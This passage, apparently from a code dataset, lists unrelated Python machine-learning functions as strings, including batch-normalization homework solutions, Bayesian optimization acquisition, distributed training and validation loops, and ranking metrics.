self._run_benchmark(params)", "def _shared_params(self):\n return BenchmarkBase._shared_params(self)._replace(\n model='resnet50', batch_size=128, distortions=False,\n optimizer='momentum')", "def batchnorm_compute(self):\n self.batchnorm_compute_tiling_wh_single_c()\n\n self.tik_instance.BuildCCE(kernel_name=self.kernel_name,\n inputs=[self.input_gm,\n self.gamma_gm,\n self.beta_gm],\n outputs=[self.output_gm],\n flowtable=[self.input_n, self.input_c,\n self.input_h, self.input_w,\n self.inputtype, self.output_n,\n self.output_c, self.output_h,\n self.output_w, self.outputtype,\n self.gamma_c, self.gammatype,\n self.beta_c, self.betatype,\n self.param1, self.param2,\n self.param3, self.param4,\n self.param5, self.param6,\n self.param7, self.param8,\n self.param9, self.param10],\n enable_l2=True,\n config={\"double_buffer_non_reuse\": True,\n \"out_of_bound_sync_check\": True})\n return 
self.tik_instance", "def calculate_batch_metrics(self):\n pass", "def syn_ucbpe(num_workers, gp, acq_optimiser, anc_data):\n # Define some internal functions.\n beta_th = _get_ucb_beta_th(_get_gp_ucb_dim(gp), anc_data.t)\n # 1. An LCB for the function\n def _ucbpe_lcb(x):\n \"\"\" An LCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu - beta_th * sigma\n # 2. A modified UCB for the function using hallucinated observations\n def _ucbpe_2ucb(x):\n \"\"\" A UCB for GP-UCB-PE. \"\"\"\n mu, sigma = gp.eval(x, uncert_form='std')\n return mu + 2 * beta_th * sigma\n # 3. UCB-PE acquisition for the 2nd point in the batch and so on.\n def _ucbpe_acq(x, yt_dot, halluc_pts):\n \"\"\" Acquisition for GP-UCB-PE. \"\"\"\n _, halluc_stds = gp.eval_with_hallucinated_observations(x, halluc_pts,\n uncert_form='std')\n return (_ucbpe_2ucb(x) > yt_dot).astype(np.double) * halluc_stds\n\n # Now the algorithm\n yt_dot_arg = _optimise_acquisition(_ucbpe_lcb, acq_optimiser, anc_data)\n yt_dot = _ucbpe_lcb(yt_dot_arg.reshape((-1, _get_gp_ucb_dim(gp))))\n recommendations = [asy_ucb(gp, acq_optimiser, anc_data)]\n for _ in range(1, num_workers):\n curr_acq = lambda x: _ucbpe_acq(x, yt_dot, np.array(recommendations))\n new_rec = _optimise_acquisition(curr_acq, acq_optimiser, anc_data)\n recommendations.append(new_rec)\n return recommendations", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n #######################################################################\n #Compute mean and variance of each element of the data.\n sample_mean = np.mean(x,axis = 0)\n sample_var = np.var(x,axis = 0)\n #Normalize\n x_normalized = (x - sample_mean) / (np.sqrt(sample_var + eps))\n #scale and shift.\n out = x_normalized * gamma + beta\n #Update running mean and variance.\n running_mean = momentum * running_mean + (1 - momentum) * sample_mean\n running_var = momentum * running_var + (1 - momentum) * sample_var\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(sample_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. 
#\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n #Normalize with running mean and var.\n x_normalized = (x - running_mean) / (np.sqrt(running_var + eps))\n #scale and shift.\n out = gamma * x_normalized + beta\n #Save the sample mean and variance as cache for backprop.\n cache = (x_normalized,np.power(running_var + eps,-0.5),gamma)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n\n return out, cache", "def run(self):\n # Single GPU flag\n single_gpu = True if size()==1 else False\n print_rank(f\"Single GPU flag Client: {single_gpu}\", loglevel=logging.DEBUG)\n \n if not single_gpu:\n while True: # keeps listening for incoming server calls\n\n # Initialize tensors -- required by torch.distributed\n command, client_idx, mode = 0, 0, 0 # int\n lr, nround = torch.zeros(1), torch.zeros(1) # float\n\n # Read command\n command = _recv(command)\n print_rank(f\"Command received {command} on worker {rank()}\", loglevel=logging.DEBUG)\n\n # Receive server data -- lr, model_params\n if command == COMMAND_UPDATE:\n print_rank(f\"COMMMAND_UPDATE received {rank()}\", loglevel=logging.DEBUG) \n lr = _recv(lr, 0)\n model_params = _recv_gradients(0)\n nround = _recv(nround, 0)\n server_data = (lr, model_params, int(nround))\n print_rank(f\"Received lr: {lr} and n_params: {len(model_params)} - round {nround}\", loglevel=logging.DEBUG)\n \n elif command == COMMAND_TRAIN:\n print_rank(f\"COMMMAND_TRAIN received {rank()}\", loglevel=logging.DEBUG)\n \n # Init profiler in training worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n profiler.enable()\n \n # Receive client id from Server\n client_idx = _recv(client_idx)\n print_rank(f\"Cliend idx received from Server: {client_idx}\", loglevel=logging.DEBUG)\n\n # Instantiate client\n client_to_process = Client(\n [client_idx],\n self.config,\n self.config['client_config']['type'] == 'optimization') \n \n # Execute Client.get_data()\n client_data = client_to_process.get_client_data()\n\n # Execute Client.process_round()\n output = client_to_process.process_round(client_data, server_data, self.model, self.data_path)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_train_output(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TESTVAL:\n print_rank(f\"COMMMAND_TESTVAL received {rank()}\", loglevel=logging.DEBUG)\n\n # Init profiler in validation worker\n profiler = None\n if self.do_profiling:\n profiler = cProfile.Profile()\n 
profiler.enable()\n \n # Receive mode and client id from Server\n mode = _recv(mode)\n mode = \"test\" if mode == -2 else \"val\"\n client_idx = _recv(client_idx)\n print_rank(f\"Client idx received from Server: {client_idx}, {mode}\", loglevel=logging.DEBUG)\n \n # Get client and dataset\n clients = self.val_clients if mode == \"val\" else self.test_clients\n dataset = self.val_dataset if mode == \"val\" else self.test_dataset\n clients_queue = clients.copy()\n assert 0 <= client_idx < len(clients_queue)\n client_to_process = clients_queue.pop(client_idx)\n\n # Execute Client.get_data()\n client_data = client_to_process.get_client_data(dataset)\n \n # Execute Client.run_testvalidate()\n output = client_to_process.run_testvalidate(client_data, server_data, mode, self.model)\n\n # Send output back to Server\n if dist.get_backend() == \"nccl\":\n # ASYNC mode -- enabled only for nccl backend\n _, metrics, num_instances = output\n metrics['num']= {'value': float(num_instances), 'higher_is_better': False}\n output = metrics\n print_rank(f\"Worker {rank()} output {output}\", loglevel=logging.DEBUG)\n ack = to_device(torch.tensor(1))\n dist.isend(tensor=ack, dst=0)\n _send_metrics(output)\n else:\n # SYNC mode -- gloo backend does not have a non-blocking way to check if the operation is completed\n gather_objects = [output for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker {rank()} sent output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n\n if self.do_profiling:\n profiler.disable()\n print_profiler(profiler)\n\n elif command == COMMAND_TERMINATE:\n print_rank(f\"COMMMAND_TERMINATE received {rank()}\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n return\n\n elif command == COMMAND_SYNC_NODES: # Only for sync calls\n print_rank(f\"COMMMAND_SYNC_NODES received {rank()}\", loglevel=logging.DEBUG)\n\n gather_objects = [None for i in range(size())]\n output = [None for _ in gather_objects]\n dist.all_gather_object(output, gather_objects[rank()])\n print_rank(f\"Worker IDLE {rank()} sent dummy output back\", loglevel=logging.DEBUG)\n\n # Some cleanup\n torch.cuda.empty_cache()\n torch.cuda.synchronize() if torch.cuda.is_available() else None\n else:\n assert False, \"unknown command\"", "def validate_average_rank(self) -> float:\n logger.info('Average rank validation ...')\n\n args = self.args\n self.biencoder.eval()\n distributed_factor = self.distributed_factor\n\n if args.use_dict_input:\n data_iterator = self.get_dict_data_iterator(args.dev_psgs_file, args.dev_queries_file,\n args.dev_qrels_file, args.dev_trec_file,\n args.dev_batch_size,\n shuffle=False, split=False)\n else:\n data_iterator = self.get_data_iterator(args.dev_file, args.dev_batch_size, shuffle=False)\n\n sub_batch_size = args.val_av_rank_bsz\n sim_score_f = ClusterNllLoss.get_similarity_function()\n q_represenations = []\n ctx_represenations = []\n positive_idx_per_question = []\n\n num_hard_negatives = args.val_av_rank_hard_neg\n num_other_negatives = args.val_av_rank_other_neg\n\n log_result_step = args.log_batch_step\n\n for i, samples_batch in enumerate(data_iterator.iterate_data()):\n # samples += 1\n if len(q_represenations) > args.val_av_rank_max_qs / distributed_factor:\n break\n\n biencoder_input = 
ClusterBertEncoder.create_biencoder_input(samples_batch, self.tensorizer,\n True,\n max_query_length=args.query_sequence_length,\n max_doc_length=args.sequence_length,\n num_hard_negatives=num_hard_negatives,\n num_other_negatives=num_other_negatives,\n shuffle=False)\n total_ctxs = len(ctx_represenations)\n ctxs_ids = biencoder_input.context_ids\n ctxs_segments = biencoder_input.ctx_segments\n bsz = ctxs_ids.size(0)\n\n # split contexts batch into sub batches since it is supposed to be too large to be processed in one batch\n for j, batch_start in enumerate(range(0, bsz, sub_batch_size)):\n\n q_ids, q_segments = (biencoder_input.question_ids, biencoder_input.question_segments) if j == 0 \\\n else (None, None)\n\n if j == 0 and args.n_gpu > 1 and q_ids.size(0) == 1:\n # if we are in DP (but not in DDP) mode, all model input tensors should have batch size >1 or 0,\n # otherwise the other input tensors will be split but only the first split will be called\n continue\n\n ctx_ids_batch = ctxs_ids[batch_start:batch_start + sub_batch_size]\n ctx_seg_batch = ctxs_segments[batch_start:batch_start + sub_batch_size]\n\n q_attn_mask = self.tensorizer.get_attn_mask(q_ids)\n ctx_attn_mask = self.tensorizer.get_attn_mask(ctx_ids_batch)\n with torch.no_grad():\n q_dense, ctx_dense = self.biencoder(q_ids, q_segments, q_attn_mask, ctx_ids_batch, ctx_seg_batch,\n ctx_attn_mask)\n\n if q_dense is not None:\n q_represenations.extend(q_dense.cpu().split(1, dim=0))\n\n ctx_represenations.extend(ctx_dense.cpu().split(1, dim=0))\n\n batch_positive_idxs = biencoder_input.is_positive\n positive_idx_per_question.extend([total_ctxs + v for v in batch_positive_idxs])\n\n if (i + 1) % log_result_step == 0:\n logger.info('Av.rank validation: step %d, computed ctx_vectors %d, q_vectors %d', i,\n len(ctx_represenations), len(q_represenations))\n\n ctx_represenations = torch.cat(ctx_represenations, dim=0)\n q_represenations = torch.cat(q_represenations, dim=0)\n\n logger.info('Av.rank validation: total q_vectors size=%s', q_represenations.size())\n logger.info('Av.rank validation: total ctx_vectors size=%s', ctx_represenations.size())\n\n q_num = q_represenations.size(0)\n assert q_num == len(positive_idx_per_question)\n\n scores = sim_score_f(q_represenations, ctx_represenations)\n values, indices = torch.sort(scores, dim=1, descending=True)\n\n rank = 0\n for i, idx in enumerate(positive_idx_per_question):\n # aggregate the rank of the known gold passage in the sorted results for each question\n gold_idx = (indices[i] == idx).nonzero()\n rank += gold_idx.item()\n\n if distributed_factor > 1:\n # each node calcuated its own rank, exchange the information between node and calculate the \"global\" average rank\n # NOTE: the set of passages is still unique for every node\n eval_stats = all_gather_list([rank, q_num], max_size=1000)\n for i, item in enumerate(eval_stats):\n remote_rank, remote_q_num = item\n if i != args.local_rank:\n rank += remote_rank\n q_num += remote_q_num\n\n av_rank = float(rank / q_num)\n logger.info('Av.rank validation: average rank %s, total questions=%d', av_rank, q_num)\n return av_rank", "def main():\n\n global G\n global C\n global D\n\n global device\n\n global c_solver\n global g_solver\n global d_optimiser\n\n global BCELossFunc\n\n # define random seed to allow reporducibility\n seed = 97\n torch.manual_seed(seed)\n random.seed(seed)\n\n # optimise for GPU learned from Vanilla GAN tutorial:\n # 
https://medium.com/ai-society/gans-from-scratch-1-a-deep-introduction-with-code-in-pytorch-and-tensorflow-cb03cdcdba0f\n device = torch.device(\"cuda:0\" if (torch.cuda.is_available() and NUM_GPUS > 0) else \"cpu\")\n\n # Generator\n G = Generator(NUM_GPUS).to(device)\n G.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n G = nn.DataParallel(G, list(range(NUM_GPUS)))\n\n # Discriminator\n C = Critic(NUM_GPUS).to(device)\n C.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n C = nn.DataParallel(C, list(range(NUM_GPUS)))\n\n # Discriminator\n D = Discriminator(NUM_GPUS).to(device)\n D.apply(initialise_weights)\n if (device.type == 'cuda') and (NUM_GPUS > 1):\n D = nn.DataParallel(D, list(range(NUM_GPUS)))\n\n # loss function and optimisers as in DCGAN paper\n BCELossFunc = nn.BCELoss()\n d_optimiser = optim.Adam(D.parameters(), lr=1e-4)\n\n # loss function and optimisers\n c_solver = optim.RMSprop(C.parameters(), lr=1e-4)\n g_solver = optim.RMSprop(G.parameters(), lr=1e-4)\n\n path = \"../output/WGAN/newResults\"\n\n epochs = train(path)\n\n # last parameter is optional for saving critic\n save_model(D, G, path, epochs, C)", "def update_grhs():\n init_gradient()\n costs_per_batch = []\n for i in range(n_train_batches):\n c = update_gradient_batch(i,*args)\n costs_per_batch.append(c)\n return numpy.mean(costs_per_batch,axis=0)", "def compute_values(self, update_statistics=False):\n\n self.compute_iterations()\n self.axsec = sum([one.axsec for one in self])\n self.xsec = sum([one.xsec for one in self])\n self.xerrc = sum([one.xerrc for one in self])\n self.xerru = math.sqrt(sum([one.xerru**2 for one in self]))\n\n self.nevents = sum([one.nevents for one in self])\n self.nw = sum([one.nw for one in self])\n self.maxit = len(self.yerr_iter) # \n self.nunwgt = sum([one.nunwgt for one in self]) \n self.wgt = 0\n self.luminosity = min([0]+[one.luminosity for one in self])\n if update_statistics:\n self.run_statistics.aggregate_statistics([_.run_statistics for _ in self])", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n \n mu = np.mean(x, axis=0)\n var = np.var(x, axis=0)\n sigma = np.sqrt(var+eps)\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. 
#\n #######################################################################\n out = gamma * (x - mu)/sigma + beta\n #out = (x - mu)/sigma\n #out = out * gamma.T + beta.T\n #print(gamma.shape)\n #out = out * gamma + beta\n #print(out.shape)\n \n running_mean = momentum * running_mean + (1 - momentum) * mu\n running_var = momentum * running_var + (1 - momentum) * (var+eps)\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n elif mode == 'test':\n #######################################################################\n # TODO: Implement the test-time forward pass for batch normalization. #\n # Use the running mean and variance to normalize the incoming data, #\n # then scale and shift the normalized data using gamma and beta. #\n # Store the result in the out variable. #\n #######################################################################\n out = (x - running_mean) / np.sqrt(running_var) * gamma + beta\n #######################################################################\n # END OF YOUR CODE #\n #######################################################################\n else:\n raise ValueError('Invalid forward batchnorm mode \"%s\"' % mode)\n\n # Store the updated running means back into bn_param\n bn_param['running_mean'] = running_mean\n bn_param['running_var'] = running_var\n cache = (x, mu, sigma, gamma, beta)\n return out, cache", "def grad_ptycho_multi_gpu(self, data, psi, prb, scan, hlamd, rho, piter, recover_prb, lock, ids):\n global BUSYGPUS\n lock.acquire() # will block if lock is already held\n for k in range(self.ngpus):\n if BUSYGPUS[k] == 0:\n BUSYGPUS[k] = 1\n gpu = k\n break\n lock.release()\n\n cp.cuda.Device(gpu).use()\n data_gpu = cp.array(data[ids], order='C')\n psi_gpu = cp.array(psi[ids])\n hlamd_gpu = cp.array(hlamd[ids])\n prb_gpu = cp.array(prb[ids])\n scan_gpu = cp.array(scan[:, ids])\n\n psi_gpu, prb_gpu = self.grad_ptycho(\n data_gpu, psi_gpu, prb_gpu, scan_gpu, hlamd_gpu, rho, piter, recover_prb, gpu)\n\n psi[ids] = psi_gpu.get()\n prb[ids] = prb_gpu.get()\n\n BUSYGPUS[gpu] = 0\n\n return psi[ids], prb[ids]", "def test_distributed(self):\n self.model.eval()\n test_loss, test_correct_preds = 0, defaultdict(int)\n if self.test_loader is None: # running G2E\n self.test_loader, self.test_size, self.test_sampler = self._get_smi_dl(phase=\"test\", shuffle=False)\n self.test_sampler.set_epoch(0)\n if self.rank == 0:\n test_loader = tqdm(self.test_loader, desc='testing...')\n else:\n test_loader = self.test_loader\n \n running_topk_accs = defaultdict(lambda: np.nan)\n with torch.no_grad():\n epoch_test_size = 0\n for i, batch in enumerate(test_loader):\n batch_data = batch[0]\n if not isinstance(batch_data, tuple):\n batch_data = batch_data.cuda(non_blocking=True)\n if self.model_name == 'TransformerEBM':\n batch_data = (batch_data, 'test')\n batch_mask = batch[1].cuda(non_blocking=True)\n batch_energies = self._one_batch(\n batch_data, batch_mask, backprop=False,\n )\n test_batch_size = batch_energies.shape[0]\n test_batch_size = torch.tensor([test_batch_size]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(test_batch_size, dist.ReduceOp.SUM)\n test_batch_size = test_batch_size.item()\n epoch_test_size += test_batch_size\n\n # for validation/test data, true rxn may not be present!\n batch_idx = batch[2]\n batch_true_ranks_array = self.proposals_data['test'][batch_idx, 2].astype('int')\n batch_true_ranks_valid = 
batch_true_ranks_array[batch_true_ranks_array < self.args.minibatch_eval]\n batch_true_ranks = torch.as_tensor(batch_true_ranks_array).unsqueeze(dim=-1)\n # slightly tricky as we have to ignore rxns with no 'positive' rxn for loss calculation\n # (bcos nothing in the numerator, loss is undefined)\n loss_numerator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n batch_true_ranks_valid\n ]\n loss_denominator = batch_energies[\n np.arange(batch_energies.shape[0])[batch_true_ranks_array < self.args.minibatch_eval],\n :\n ]\n batch_loss = (loss_numerator + torch.logsumexp(-loss_denominator, dim=1)).sum().item()\n\n for k in self.k_to_test:\n # index with lowest energy is what the model deems to be the most feasible rxn\n batch_preds = torch.topk(batch_energies, k=k, dim=1, largest=False)[1] \n batch_correct_preds = torch.where(batch_preds == batch_true_ranks)[0].shape[0]\n batch_correct_preds = torch.tensor([batch_correct_preds]).cuda(self.gpu, non_blocking=True)\n dist.all_reduce(batch_correct_preds, dist.ReduceOp.SUM)\n batch_correct_preds = batch_correct_preds.item()\n test_correct_preds[k] += batch_correct_preds\n running_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n\n if k == 1 and self.rank == 0: # overhead is only 5 ms, will check ~5 times each epoch (regardless of batch_size)\n try:\n for j in range(i * self.args.batch_size_eval, (i+1) * self.args.batch_size_eval):\n if j % (self.test_size // 5) == random.randint(0, 3) or j % (self.test_size // 8) == random.randint(0, 5): # peek at a random sample of current batch to monitor training progress\n rxn_idx = random.sample(list(range(self.args.batch_size_eval)), k=1)[0]\n rxn_true_rank = batch_true_ranks_array[rxn_idx]\n rxn_pred_rank = batch_preds[rxn_idx, 0].item()\n rxn_pred_energy = batch_energies[rxn_idx, rxn_pred_rank].item()\n rxn_true_energy = batch_energies[rxn_idx, rxn_true_rank].item() if rxn_true_rank != 9999 else 'NaN'\n rxn_orig_energy = batch_energies[rxn_idx, 0].item()\n rxn_orig_energy2 = batch_energies[rxn_idx, 1].item()\n rxn_orig_energy3 = batch_energies[rxn_idx, 2].item()\n\n rxn_true_prod = self.proposals_data['test'][batch_idx[rxn_idx], 0]\n rxn_true_prec = self.proposals_data['test'][batch_idx[rxn_idx], 1]\n rxn_cand_precs = self.proposals_data['test'][batch_idx[rxn_idx], 3:]\n rxn_pred_prec = rxn_cand_precs[batch_preds[rxn_idx]]\n rxn_orig_prec = rxn_cand_precs[0]\n rxn_orig_prec2 = rxn_cand_precs[1]\n rxn_orig_prec3 = rxn_cand_precs[2]\n logging.info(f'\\ntrue product: \\t\\t\\t\\t{rxn_true_prod}')\n logging.info(f'pred precursor (rank {rxn_pred_rank}, energy = {rxn_pred_energy:+.4f}):\\t\\t\\t{rxn_pred_prec}')\n if rxn_true_energy == 'NaN':\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy}):\\t\\t\\t\\t{rxn_true_prec}')\n else:\n logging.info(f'true precursor (rank {rxn_true_rank}, energy = {rxn_true_energy:+.4f}):\\t\\t\\t{rxn_true_prec}')\n logging.info(f'orig precursor (rank 0, energy = {rxn_orig_energy:+.4f}):\\t\\t\\t{rxn_orig_prec}')\n logging.info(f'orig precursor (rank 1, energy = {rxn_orig_energy2:+.4f}):\\t\\t\\t{rxn_orig_prec2}')\n logging.info(f'orig precursor (rank 2, energy = {rxn_orig_energy3:+.4f}):\\t\\t\\t{rxn_orig_prec3}\\n')\n break\n except Exception as e:\n tb_str = traceback.format_exception(etype=type(e), value=e, tb=e.__traceback__)\n logging.info(\"\".join(tb_str))\n logging.info('\\nIndex out of range (last minibatch)')\n \n batch_loss = torch.tensor([batch_loss]).cuda(self.gpu, 
non_blocking=True)\n dist.all_reduce(batch_loss, dist.ReduceOp.SUM)\n batch_loss = batch_loss.item()\n test_loss += batch_loss\n if self.rank == 0:\n test_loader.set_description(f\"testing...loss={test_loss / test_batch_size:.4f}, top-1 acc={running_topk_accs[1]:.4f}, top-5 acc={running_topk_accs[5]:.4f}, top-10 acc={running_topk_accs[10]:.4f}\")\n test_loader.refresh()\n \n for k in self.k_to_test:\n self.test_topk_accs[k] = test_correct_preds[k] / epoch_test_size\n \n dist.barrier()\n message = f\"{self.args.expt_name}\\n\"\n if self.rank == 0:\n logging.info(f'\\nTest loss: {test_loss / epoch_test_size:.4f}')\n for k in self.k_to_test:\n this_topk_message = f'Test top-{k} accuracy: {100 * self.test_topk_accs[k]:.3f}%'\n logging.info(this_topk_message)\n message += this_topk_message + '\\n'\n try:\n send_message(message)\n except Exception as e:\n pass", "def perturb_and_get_rank(embedding, w, a, r, b, test_size, batch_size=100, all_batches=True, flow_log_prob=None):\n n_batch = (test_size + batch_size - 1) // batch_size\n ranks = []\n if all_batches is False:\n n_batch = 1\n # import ipdb;ipdb.set_trace()\n for idx in range(n_batch): # n_batch TODO\n batch_start = idx * batch_size\n batch_end = min(test_size, (idx + 1) * batch_size)\n batch_a = a[batch_start: batch_end]\n batch_r = r[batch_start: batch_end]\n emb_ar = embedding[batch_a] * w[batch_r]\n emb_ar = emb_ar.transpose(0, 1).unsqueeze(2) # size: D x E x 1\n emb_c = embedding.transpose(0, 1).unsqueeze(1) # size: D x 1 x V\n # out-prod and reduce sum\n out_prod = torch.bmm(emb_ar, emb_c) # size D x E x V\n score = torch.sum(out_prod, dim=0) # size E x V\n if score is not None:\n score = score + flow_log_prob\n score = torch.sigmoid(score)\n target = b[batch_start: batch_end]\n ranks.append(sort_and_rank(score, target))\n\n _running_ranks = 1.0+torch.cat((ranks)).float()\n mrr = torch.mean(1.0 / _running_ranks)\n mr = torch.mean(_running_ranks)\n avg_count = []\n for hit in [1,5,10]:\n avg_count.append( torch.mean((_running_ranks <= hit).float()).item())\n print(\"batch {} / {}: MR : {:.6f} | MRR : {:.6f} | Hit1: {:.6f} | Hit5: {:.6f} | Hit10: {:.6f}\".format(\n idx, n_batch, mr.item(), mrr.item(), avg_count[0], avg_count[1], avg_count[2]))\n\n return torch.cat(ranks)", "def calc_and_store_numba(kernel, storage_backend, fft_data, ch_it, info_dict):\n from mpi4py import MPI\n import datetime\n from socket import gethostname\n import numpy as np\n import math\n\n comm = MPI.COMM_WORLD\n\n # Code below tests dummy kernel\n # out_arr = np.zeros(100)\n # threadsperblock = 32\n # blockspergrid = (out_arr.size + (threadsperblock - 1)) // threadsperblock\n # kernel[blockspergrid, threadsperblock](out_arr)\n # End test of dummy kernel\n\n result = np.zeros([len(ch_it), fft_data.data.shape[1], 3], dtype=fft_data.data.dtype)\n \n threads_per_block = (32, 32)\n num_blocks = [math.ceil(s / t) for s, t in zip(result.shape, threads_per_block)]\n ch1_idx_arr = np.array([c.ch1.get_idx() for c in ch_it])\n ch2_idx_arr = np.array([c.ch2.get_idx() for c in ch_it])\n win_factor = 1.0\n\n # Try changing flags to C_CONTIGUOUS\n # Passing fft_data.data directly into the kernel always fails.\n # I checked size and passing a dummy array of similar shape and dtype.\n # That worked, buy never fft_data.data\n # I also checked the flags. fft_data.data.C_CONTIGUOUS was false. 
Setting it to true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def compute(self) -> Tuple[float, float, float]:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n self.statistics = {\n k: xm.mesh_reduce(k, v, np.sum) for k, v in self.statistics.items()\n }\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[int] = all_gather(self.statistics[key])\n value: int = sum(value)\n self.statistics[key] = value\n\n precision_value, recall_value, f1_value = get_binary_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n zero_division=self.zero_division,\n )\n return precision_value, recall_value, f1_value", "def update_prior_dist(batch_size, alpha, beta):\n global prior_dist\n grid_points = torch.arange(1., 2*batch_size, 2.).float().cuda() / (2*batch_size)\n grid_points_np = grid_points.cpu().numpy()\n grid_points_icdf = stats.beta.ppf(grid_points_np, a=alpha, b=beta)\n prior_dist = torch.tensor(grid_points_icdf).float().cuda().unsqueeze(1)", "def batchnorm_forward(x, gamma, beta, bn_param):\n mode = bn_param['mode']\n eps = bn_param.get('eps', 1e-5)\n momentum = bn_param.get('momentum', 0.9)\n\n N, D = x.shape\n running_mean = bn_param.get('running_mean', np.zeros(D, dtype=x.dtype))\n running_var = bn_param.get('running_var', np.zeros(D, dtype=x.dtype))\n\n out, cache = None, None\n if mode == 'train':\n #######################################################################\n # TODO: Implement the training-time forward pass for batch norm. #\n # Use minibatch statistics to compute the mean and variance, use #\n # these statistics to normalize the incoming data, and scale and #\n # shift the normalized data using gamma and beta. #\n # #\n # You should store the output in the variable out. Any intermediates #\n # that you need for the backward pass should be stored in the cache #\n # variable. #\n # #\n # You should also use your computed sample mean and variance together #\n # with the momentum variable to update the running mean and running #\n # variance, storing your result in the running_mean and running_var #\n # variables. #\n # #\n # Note that though you should be keeping track of the running #\n # variance, you should normalize the data based on the standard #\n # deviation (square root of variance) instead! # \n # Referencing the original paper (https://arxiv.org/abs/1502.03167) #\n # might prove to be helpful. 
